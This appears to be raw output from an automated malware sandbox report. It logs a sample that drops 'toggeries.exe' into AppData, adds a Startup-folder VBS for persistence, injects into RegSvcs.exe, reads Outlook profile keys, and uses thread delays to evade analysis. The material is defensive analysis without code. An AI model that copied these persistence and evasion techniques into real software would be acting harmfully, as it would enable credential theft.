                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 6cicUo3f8g.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: wntdll.pdbUGP source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: 6cicUo3f8g.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_008E4B37 LoadLibraryA,GetProcAddress,0_2_008E4B37
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeCode function: 0_2_00908945 push ecx; ret 0_2_00908958
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exeCode function: 2_2_00B08945 push ecx; ret 2_2_00B08958
                Source: C:\Users\user\Desktop\6cicUo3f8g.exeFile created: C:\Users\user\AppData\Local\Thebesian\toggeries.exeJump to dropped file

                Boot Survival

                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_008E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008E48D7
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00965376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00965376
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00AE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00AE48D7
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00B65376
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00903187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00903187
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | API/Special instruction interceptor: Address: F668AC
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | API/Special instruction interceptor: Address: C407C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599343
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599234
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599125
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599015
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598906
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598726
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598281
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598171
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598062
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597953
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597734
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597625
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597406
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597296
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597187
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596421
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596306
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596166
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595796
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595687
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595578
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595030Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599782Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593954Jump to behavior
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1845
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 8002
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 1999
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 7812
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-105712)
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | API coverage: 5.9 %
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | API coverage: 6.1 %
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0094445A
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094C6D1 FindFirstFileW,FindClose,0_2_0094C6D1
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0094C75C
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0094EF95
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0094F0F2
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0094F3F3
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_009437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009437EF
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00943B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00943B12
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0094BCBC
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00B4445A
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4C6D1 FindFirstFileW,FindClose,2_2_00B4C6D1
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00B4C75C
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B4EF95
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B4F0F2
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B4F3F3
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B437EF
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B43B12
                Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B4BCBC
                Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_008E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008E49A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599890
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599780
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599671
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599343
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599234
